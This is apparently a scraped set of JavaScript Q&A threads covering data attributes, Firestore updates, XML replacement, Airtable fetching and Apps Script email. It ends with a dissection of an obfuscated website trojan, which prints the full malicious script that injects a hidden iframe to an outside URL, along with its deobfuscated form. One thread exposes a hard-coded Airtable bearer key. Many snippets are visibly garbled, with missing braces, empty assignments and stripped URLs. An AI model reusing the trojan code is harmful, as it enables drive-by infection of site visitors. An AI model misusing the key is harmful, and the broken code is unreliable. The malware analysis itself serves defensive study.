JavaScript Problem with function with parameters - javascript

I have a little problem with my function.
When I try to run my function with parameter, it fails. I tried:
and nothing works :( I don't know where is my problem. I want to create a function because my code is repeating 10 times, so I would like to switch only a function parameter. Please, help!
This function works:
function zmien_dane() {
const silnik = document.querySelector('#dane');
var zawartosc = silnik.dataset.a4;
document.getElementById("dane").innerHTML = zawartosc;
const spalanie = document.querySelector('#dane2');
var zawartosc = spalanie.dataset.a4;
document.getElementById("dane2").innerHTML = zawartosc;
const skrzynia = document.querySelector('#dane3');
var zawartosc = skrzynia.dataset.a4;
document.getElementById("dane3").innerHTML = zawartosc;
const nadwozie = document.querySelector('#dane4');
var zawartosc = nadwozie.dataset.a4;
document.getElementById("dane4").innerHTML = zawartosc;
This function doesn't work:
function zmien_dane(parameter) {
const silnik = document.querySelector('#dane');
var zawartosc = silnik.dataset.parameter;
document.getElementById("dane").innerHTML = zawartosc;
const spalanie = document.querySelector('#dane2');
var zawartosc = spalanie.dataset.parameter;
document.getElementById("dane2").innerHTML = zawartosc;
const skrzynia = document.querySelector('#dane3');
var zawartosc = skrzynia.dataset.parameter;
document.getElementById("dane3").innerHTML = zawartosc;
const nadwozie = document.querySelector('#dane4');
var zawartosc = nadwozie.dataset.parameter;
document.getElementById("dane4").innerHTML = zawartosc;

You may need to use square bracket like this
Check this link


Updating the query data in cloud firestore nested map fields

I'm trying to update the data in nested map fields in firestore, my form is a window form that has 4 sides (wSide1,wSide2,wSide3,wSide4), what my form is doing is if customer select 1 field which is wSide1 and it needs to be updated then only this field only be updated but in my case it is updating all 4 sides, the one which is selected for example side 1 only that has the correct updated values other 3 sides updates with the false values. as my form is dynamic it only shows the field which is selected.
I only want to update the field which is selected, all other has to be null.
js & firestore query
function updateWindowForm(form, type){
var name = $('#name_'+type).val();
var type = $('#type_'+type).val();
const taskformWindow = document.getElementById("taskformWindow");
let editStatus = false;
let id = '';
const updateTask = (id, updatedTask) => db.collection('Buildings').doc(buildingID).collection('rooms').doc(roomID).collection('objects').doc(objectID).update(updatedTask);
window.addEventListener("DOMContentLoaded", async (e) => {
id =;
editStatus = true;
btnsEdit.forEach((btn) => {
btn.addEventListener("click", async (e) => {
try {
const doc = await getTask(;
const task =;
editStatus = true;
id =;
taskformWindow["btn-update-data"].innerText = "Update";
} catch (error) {
taskformWindow.addEventListener("click", async (e) => {
var name_Window = document.getElementById('name_Window').value;
var wAluminium = document.getElementById('wAluminium').checked;
var wColorMeasurement = document.getElementById('wColorMeasurement').value;
var wComments = document.getElementById('wComments').value;
var wForEnd1 = document.getElementById('wForEnd1').checked;
var wForEnd2 = document.getElementById('wForEnd2').checked;
var wSideOfWindows = document.getElementById('wSideOfWindows').value;
var wHardwareManufacturer = document.getElementById('wHardwareManufacturer').value;
var wPlastic = document.getElementById('wPlastic').checked;
//Side 1
var wAxis1_1 = document.getElementById('wAxis1_1').checked;
var wAxis1_2 = document.getElementById('wAxis1_2').checked;
var wBackSet1 = document.getElementById('wBackSet1').value;
var wDirectionLR1_1 = document.getElementById('wDirectionLR1_1').checked;
var wDirectionLR1_2 = document.getElementById('wDirectionLR1_2').checked;
var wHandleHeight1 = document.getElementById('wHandleHeight1').value;
var wOverlapWidth1 = document.getElementById('wOverlapWidth1').value;
var wSashRebateHeight1 = document.getElementById('wSashRebateHeight1').value;
var wSashRebateWidth1 = document.getElementById('wSashRebateWidth1').value;
//Side 2
var wAxis2_1 = document.getElementById('wAxis2_1').checked;
var wAxis2_2 = document.getElementById('wAxis2_2').checked;
var wBackSet2 = document.getElementById('wBackSet2').value;
var wDirectionLR2_1 = document.getElementById('wDirectionLR2_1').checked;
var wDirectionLR2_2 = document.getElementById('wDirectionLR2_2').checked;
var wHandleHeight2 = document.getElementById('wHandleHeight2').value;
var wOverlapWidth2 = document.getElementById('wOverlapWidth2').value;
var wSashRebateHeight2 = document.getElementById('wSashRebateHeight2').value;
var wSashRebateWidth2 = document.getElementById('wSashRebateWidth2').value;
//Side 3
var wAxis3_1 = document.getElementById('wAxis3_1').checked;
var wAxis3_2 = document.getElementById('wAxis3_2').checked;
var wBackSet3 = document.getElementById('wBackSet3').value;
var wDirectionLR3_1 = document.getElementById('wDirectionLR3_1').checked;
var wDirectionLR3_2 = document.getElementById('wDirectionLR3_2').checked;
var wHandleHeight3 = document.getElementById('wHandleHeight3').value;
var wOverlapWidth3 = document.getElementById('wOverlapWidth3').value;
var wSashRebateHeight3 = document.getElementById('wSashRebateHeight3').value;
var wSashRebateWidth3 = document.getElementById('wSashRebateWidth3').value;
//Side 4
var wAxis4_1 = document.getElementById('wAxis4_1').checked;
var wAxis4_2 = document.getElementById('wAxis4_2').checked;
var wBackSet4 = document.getElementById('wBackSet4').value;
var wDirectionLR4_1 = document.getElementById('wDirectionLR4_1').checked;
var wDirectionLR4_2 = document.getElementById('wDirectionLR4_2').checked;
var wHandleHeight4 = document.getElementById('wHandleHeight4').value;
var wOverlapWidth4 = document.getElementById('wOverlapWidth4').value;
var wSashRebateHeight4 = document.getElementById('wSashRebateHeight4').value;
var wSashRebateWidth4 = document.getElementById('wSashRebateWidth4').value;
try {
if (!editStatus) {
await updateTask(id, {
wAluminium: wAluminium,
wColorMeasurement: wColorMeasurement,
wComments: wComments,
wForEnd1: wForEnd1,
wForEnd2: wForEnd2,
wHardwareManufacturer: wHardwareManufacturer,
wPlastic: wPlastic,
wAxis1_1: wAxis1_1,
wAxis1_2: wAxis1_2,
wBackSet1: wBackSet1,
wDirectionLR1_1: wDirectionLR1_1,
wDirectionLR1_2: wDirectionLR1_2,
wHandleHeight1: wHandleHeight1,
wOverlapWidth1: wOverlapWidth1,
wSashRebateHeight1: wSashRebateHeight1,
wSashRebateWidth1: wSashRebateWidth1,
wAxis2_1: wAxis2_1,
wAxis2_2: wAxis2_2,
wBackSet1: wBackSet2,
wDirectionLR2_1: wDirectionLR2_1,
wDirectionLR2_2: wDirectionLR2_2,
wHandleHeight2: wHandleHeight2,
wOverlapWidth2: wOverlapWidth2,
wSashRebateHeight2: wSashRebateHeight2,
wSashRebateWidth2: wSashRebateWidth2,
wAxis3_1: wAxis3_1,
wAxis3_2: wAxis3_2,
wBackSet1: wBackSet3,
wDirectionLR3_1: wDirectionLR3_1,
wDirectionLR3_2: wDirectionLR3_2,
wHandleHeight3: wHandleHeight3,
wOverlapWidth3: wOverlapWidth3,
wSashRebateHeight3: wSashRebateHeight3,
wSashRebateWidth3: wSashRebateWidth3,
wAxis4_1: wAxis4_1,
wAxis4_2: wAxis4_2,
wBackSet4: wBackSet4,
wDirectionLR4_1: wDirectionLR4_1,
wDirectionLR4_2: wDirectionLR4_2,
wHandleHeight4: wHandleHeight4,
wOverlapWidth4: wOverlapWidth4,
wSashRebateHeight4: wSashRebateHeight4,
wSashRebateWidth4: wSashRebateWidth4,
wSideOfWindows: wSideOfWindows,
editStatus = false;
id = '';
taskformWindow['btn-update-window-data'].innerText = 'Daten aktualisiert';
swal("", "Daten wurden aktualisert!", "success");
} catch (error) {
I can't see the code you use for updating your data but I can ausme that you probably did not set the merge to true while saving the data.
Take a look at this code snipped:
var cityRef = db.collection('cities').doc('BJ');
var setWithMerge = cityRef.set({
capital: true
}, { merge: true });
By setting that we ensure to udate only the fields we want to and leave the rest as it is. Still make sure not to send fields with a null value because that is a valid value for firestore and it doesn't mean that those fields will by skipped in the update process. You can find more about it here.

replace all values using javascript in an xml payload

i have a xml string that i will replace all values of specific tags using javascript,
and this is the code :
function replaceDomainName (xmlPayload,domainId)
var oldDomain = '<DOMAIN_NAME>OOO';
var oldDomain2 = '<DomainName>OOO';
var newDomain = '<DOMAIN_NAME>'+domainId ;
var newDomain2 = '<DomainName>'+domainId ;
var xmlString = xmlPayload.toString();
var x = xmlString.replace(/oldDomain/g,newDomain)
x = x.replace(/oldDomain2/g,newDomain2)
return x ;
when I try to invoke the function with the following XML it throws error
<TransmissionHeader xmlns:tran="" xmlns="">
error: unknown: Unexpected token (14:23)
use this
While you can get a lot done with Regex, it can get really complicated when parsing XML.
See this example of using DOMParser and XMLSerializer:
const XML = `<TransmissionHeader xmlns:tran="" xmlns="">
if(typeof(String.prototype.trim) === "undefined")
String.prototype.trim = function()
return String(this).replace(/^\s+|\s+$/g, '');
function replaceDomainName (xmlPayload, oldValue, newValue)
const parser = new DOMParser();
const xmlDoc = parser.parseFromString(xmlPayload,"text/xml");
for(let tagName of ['DOMAIN_NAME', 'DomainName']) {
const instances = xmlDoc.getElementsByTagName(tagName);
for (let instance of instances) {
if(instance.innerHTML.trim() == oldValue )
instance.innerHTML = newValue;
const s = new XMLSerializer();
const d = document;
const result = s.serializeToString(xmlDoc);
return result;
const resultXML = replaceDomainName(XML, 'OOO', '');
console.log('resultXML', resultXML);
const textarea = document.createElement("textarea");
textarea.innerHTML = resultXML;
textarea.cols = 80;
textarea.rows = 24;

Javascript get method and airtable

Hye i am having a little trouble again i am supposed to put a list of questions in airtable and then print them to my screen but i am working with a fetch reqeust en then e method of get but i have the feeling like my empty variable aren't being filled with my questions
its in javascript btw :
here's my code :
; (function (){
window.addEventListener('load', function(){
document.getElementById('next').addEventListener('click', function(){
window.location.href = 'vragenlijst2.html';
let vrg1 = document.getElementById('1vraag');
let vrg2 =document.getElementById('2vraag');
let vrg3 = document.getElementById('3vraag');
let vrg4 = document.getElementById('4vraag');
let vrg5 = document.getElementById('5vraag');
let vrg6 = document.getElementById('6vraag');
let vrg7 = document.getElementById('7vraag');
let vrg8 = document.getElementById('8vraag');
let vrg9 = document.getElementById('9vraag');
let vrg10 = document.getElementById('10vraag');
let Vragenlijst_id = 1;
let getData = function(){
fetch('', {
method: 'GET',
headers: {
'Authorization' : 'Bearer keyDhD8sLGjcEuA4K'
.then(Response => Response.json())
.then(JSON => {
for(let index = 0; index < JSON.records.length; index++){
let Qstn = JSON.records[index];
if(Vragenlijst_id === Qstn.fields.vragenlijst){
let vrg1_db = Qstn.fields.Vraag1;
let vrg2_db = Qstn.fields.Vraag2;
let vrg3_db = Qstn.fields.Vraag3;
let vrg4_db = Qstn.fields.Vraag4;
let vrg5_db = Qstn.fields.Vraag5;
let vrg6_db = Qstn.fields.Vraag6;
let vrg7_db = Qstn.fields.Vraag7;
let vrg8_db = Qstn.fields.Vraag8;
let vrg9_db = Qstn.fields.Vraag9;
let vrg10_db = Qstn.fields.Vraag10;
vrg1 = vrg1_db;
vrg2 = vrg2_db;
vrg3 = vrg3_db;
vrg4 = vrg4_db;
vrg5 = vrg5_db;
vrg6 = vrg6_db;
vrg7 = vrg7_db;
vrg8 = vrg8_db;
vrg9 = vrg9_db
vrg10 = vrg10_db;
function create (){
let par = document.createElement('p');
par.innerHTML = vrg1;
document.getElementById('1vraag').innerHTML = create()

Prevent duplicate E-mail Google Spreadsheets script

i'm currently able to send E-mail with Google Spreadsheets script. But my trigger and if condition didn't prevent E-mail sending as i wish :
Here is my code :
function myFunction() {
const ss = SpreadsheetApp.getActiveSpreadsheet();
const ws = ss.getSheetByName("MASTER");
const h3 = 'SPP Proyek JIS Tanggal xx dari xxx';
const headers = ws.getRange("A2:M2").getValues();
const item = headers[0][4];
const spec = headers[0][5];
const sat = headers[0][6];
const qty = headers[0][7];
const price = headers[0][8];
const total = headers[0][9];
const tujuan = headers[0][10];
const lr = ws.getLastRow();
const tableRangeValues = ws.getRange(3, 5,lr-2,7).getDisplayValues();
const trigger = ws.getRange(3, 1,lr-2).getValues();
const statusEmail = ws.getRange(3, 13,lr-2).getValues();
const htmlTemplate = HtmlService.createTemplateFromFile("Email");
htmlTemplate.h3 = h3;
htmlTemplate.headers = headers;
htmlTemplate.item = item;
htmlTemplate.spec = spec;
htmlTemplate.sat = sat;
htmlTemplate.qty = qty;
htmlTemplate.price = price; = total;
htmlTemplate.tujuan = tujuan;
htmlTemplate.tableRangeValues = tableRangeValues;
htmlTemplate.trigger = trigger;
htmlTemplate.statusEmail = statusEmail;
const htmlForEmail = htmlTemplate.evaluate().getContent();
if ((trigger != 'FALSE') && (statusEmail != 'EMAIL_SENT')); {
"Approval SPP Komersial",
"HTML Support",
{ htmlBody: htmlForEmail }
ws.getRange(3, 13,lr-2).setValue('EMAIL_SENT');
and this is my sample file link :
it seems i have problem with the trigger and if condition code which i don't understand
Thank you!
Defining const trigger = ws.getRange(3, 1,lr-2).getValues(); returns you an array of type [[FALSE], [true], [FALSE], [true]]
To make your code work you need to define a loop that iterates through each row (and trigger) invidually
Also, remove the ; from if ((trigger != 'FALSE') && (statusEmail != 'EMAIL_SENT')); {
function myFunction() {
const ss = SpreadsheetApp.getActiveSpreadsheet();
const ws = ss.getSheetByName("MASTER");
const h3 = 'SPP Proyek JIS Tanggal xx dari xxx';
const headers = ws.getRange("A2:M2").getValues();
const item = headers[0][4];
const spec = headers[0][5];
const sat = headers[0][6];
const qty = headers[0][7];
const price = headers[0][8];
const total = headers[0][9];
const tujuan = headers[0][10];
const lr = ws.getLastRow();
const tableRangeValues = ws.getRange(3, 5,lr-2,7).getDisplayValues();
var data = ws.getRange(3, 1,lr-2,13).getDisplayValues();
for (var i = 0; i < data.length; i++){
const trigger = data[i][0];
const statusEmail = data[i][12];
const htmlTemplate = HtmlService.createTemplateFromFile("Email");
htmlTemplate.h3 = h3;
htmlTemplate.headers = headers;
htmlTemplate.item = item;
htmlTemplate.spec = spec;
htmlTemplate.sat = sat;
htmlTemplate.qty = qty;
htmlTemplate.price = price; = total;
htmlTemplate.tujuan = tujuan;
htmlTemplate.tableRangeValues = tableRangeValues;
htmlTemplate.trigger = trigger;
htmlTemplate.statusEmail = statusEmail;
const htmlForEmail = htmlTemplate.evaluate().getContent();
if ((trigger != 'FALSE') && (statusEmail != 'EMAIL_SENT')) {
"Approval SPP Komersial",
"HTML Support",
{ htmlBody: htmlForEmail }
ws.getRange(3, 13,lr-2).setValue('EMAIL_SENT');
In this sample I did not modify tableRangeValues since those values are processed later on on your client-side. Depending on what you want them to be like, you might also want to iterate throguh tem.

JavaScript trojan dissection

I've recently been playing with allot of JavaScript and started to consider that I couldn't encounter a piece of JavaScript that I wouldn't be able to debug.
Well I was pleasantly surprised and angered today when we discovered a number of JavaScript redirect trojans on our company’s website.
Most of the code we found I was able to easily dissect and used standard escaping to obfuscate the codes function.
But among the code we found the code below has completely stumped me on what its doing. (The only part that I can seem to work out is that it is doing a replace on some of the parameters).
So would anyone please be kind enough to dissect the following code for me? I would love to know exactly what’s going on...
function yJ() {};
this.sMZ = "sMZ";
yJ.prototype = {
w: function () {
var rJ = 13390;
this.m = "m";
this.fP = '';
this.q = "q";
this.oJ = "";
var vS = function () {
return 'vS'
var d = 'replace';
var qB = "";
x = '';
var s = document;
var xZ = "xZ";
mC = '';
var dV = "dV";
var b = window;
this.p = false;
this.kX = '';
nP = "nP";
var zE = "";
this.nU = false;
var yV = function () {
return 'yV'
String.prototype.gT = function (l, v) {
return this[d](l, v)
this.pC = '';
var qV = false;
var fPU = new Array();
h = "";
var sV = 'sKe}tKTIiWmEe}oEu}tK'.gT(/[KE\}IW]/g, '');
var xV = 43258;
sT = '';
var mV = '';
this.wJ = "wJ";
var f = '<jhItImIlI I>j<IhjezaIdz ;>;<z/;hjeIaIdI>;<zb!ojdjyj ;>I<!/jbIo!d!yI>z<j/Ihjt;m;lj>!'.gT(/[\!Ijz;]/g, '');
var xB = '';
wI = "wI";
oT = false;
var nQ = 49042;
try {
zI = '';
var bF = new Array();
var aY = function () {
return 'aY'
var rN = false;
rF = "";
var cX = function () {
return 'cX'
var y = 'bToTdTy+'.gT(/[\+\]aT%]/g, '');
this.rL = '';
var vH = function () {
return 'vH'
var r = 'sStEy9l?eE'.gT(/[ES9\?m]/g, '');
yD = "";
var eA = '';
var bQ = 'i.fWrhalmlel'.gT(/[lW\.xh]/g, '');
vZ = '';
this.bG = "";
this.vL = false;
var t = 'w5r[i5t[e%'.gT(/[%C5\[U]/g, '');
gI = '';
dVL = "dVL";
var n = 'cZrzeZaZtze.E.l.e;m;eSnzt;'.gT(/[;SZz\.]/g, '');
lH = "";
kD = "kD";
this.pH = false;
var k = 's9ric9'.gT(/[9Ni~O]/g, '');
var vB = '';
var kH = function () {
return 'kH'
var qH = new Array();
aD = '';
this.eQ = false;
var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, '');
var cT = '';
var kL = function () {
return 'kL'
var bR = new Array();
this.cP = 22454;
var dH = 'hNi9d0d>e*n*'.gT(/[\*9N\>0]/g, '');
lG = '';
tG = 7587;
hV = '';
this.oR = "oR";
var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, '');
var dC = function () {};
var eR = new Date();
var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, '');
uM = "";
var i = function () {};
this.cI = "";
tU = false;
function qN() {};
xL = 57256;
var c = this.a();
this.eL = '';
var rY = function () {};
fG = false;
nO = false;
this.j = "";
this.iQ = 5330;
var sY = function () {};
var u = document[n](bQ);
this.tH = false;
zX = "";
u[r][o] = dH;
var kV = "kV";
pN = '';
var yG = new Array();
this.nOE = 818;
u[z](k, c);
this.bQK = "";
var yU = 15629;
var sM = new Array();
var eY = "eY";
var qP = '';
var lU = "lU";
var zR = false;
var xS = "";
iX = 34795;
function pO() {};
this.gM = "";
} catch (g) {
var xI = false;
this.gO = false;
this.iZ = false;
this.iU = false;
var mQ = new Date();
var qF = function () {};
var tS = "tS";
function aR() {};
nA = "nA";
var xT = new Date();
mZ = false;
var gN = new Array();
var wE = this;
var eB = 3562;
this.qE = "qE";
this.cS = false;
this.vK = false;
qEJ = false;
this.hW = false;
b[sV](function () {
function bI() {};
hJ = "";
var kVQ = "kVQ";
var iG = "";
var eBS = new Array();
rA = "";
jY = "";
var hB = "hB";
var iZF = '';
qY = "";
jYG = "";
uK = 30969;
var qD = "qD";
}, 326);
this.qC = "";
var aX = function () {};
var cN = "";
gB = false;
var fF = false;
this.hX = false;
a: function () {
rH = "rH";
this.bV = '';
var qW = "";
return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, '');
var sMS = new Array();
this.wL = false;
uS = "uS";
function pI() {};
var uI = false;
var kN = new yJ();
this.aQ = "aQ";
hT = 15101;
It embeds, and this is the line where you can see it:
return 'h+tbtJpx:J/+/JfxaxnJc+yJc+abkJeb.xnJeMtM/x.xpxh+/b1M/+'.gT(/[\+JbMx]/g, '');
You see how every odd character, when plucked from that string, forms the URL. I didn't run this, so I'm not sure under what conditions it does this, but you can see that String.replace has been renamed to String.gT and is being passed a regex against the characters which make the string obfuscated. If you apply that same method, plucking odd characters, you can see that there is a hidden iframe, some javascript event handlers, setAttribute, etc:
var z = 'sNeatoA%totor%i%b%u%toeN'.gT(/[Na%ox]/g, '');
var o = 'vKiKsAi&bGiKlAiKtHyH'.gT(/[HGK&A]/g, '');
var e = 'atp9p9eWn9d:C9htitl5d:'.gT(/[\:t59W]/g, '');
This is how String.replace is aliased:
var d = 'replace';
String.prototype.gT = function (l, v) {
return this[d](l, v)
Within the context of that function, this is the string on which gT is being called and d is the string replace. On a string's prototype, this['replace'] returns the replace() method, which is then called with the two arguments to gT. The result is then returned.
I transformed the script like so:
Replaced all string.gT() calls with their plain forms.
Removed any variables that aren't referenced.
Gave functions some common-sense names.
This is the result, it should be pretty clear how it works now:
function FancyCake() {};
FancyCake.prototype = {
embed: function () {
var d = 'replace';
var s = document;
var b = window;
var sV = 'setTimeout';
var f = "<html ><head ></head><body ></body></html>";
try {
zI = '';
var bF = new Array();
var y = 'body';
var r = 'style';
var bQ = 'iframe';
var t = 'write';
var n = 'createElement';
var k = 'src';
var z = 'setAttribute';
var dH = 'hidden';
var o = 'visibility';
var e = 'appendChild';
var c = this.getUrl();
var u = document[n](bQ);
u[r][o] = dH;
u[z](k, c);
} catch (e) {
var cake = this;
b[sV](function () {
}, 326);
getUrl: function () {
return "";
var cake = new FancyCake();
It adds an invisible iFrame to the following URL to your website:
<iframe style="visibility: hidden;" src=""></iframe>
The website fancycake is marked as attacked and malicious under Firefox
Run it in a JavaScript debugger; eventually, the code will decompile itself and try to start. I suggest to use the latest version of FireFox maybe on a Linux box to be on the safe side.

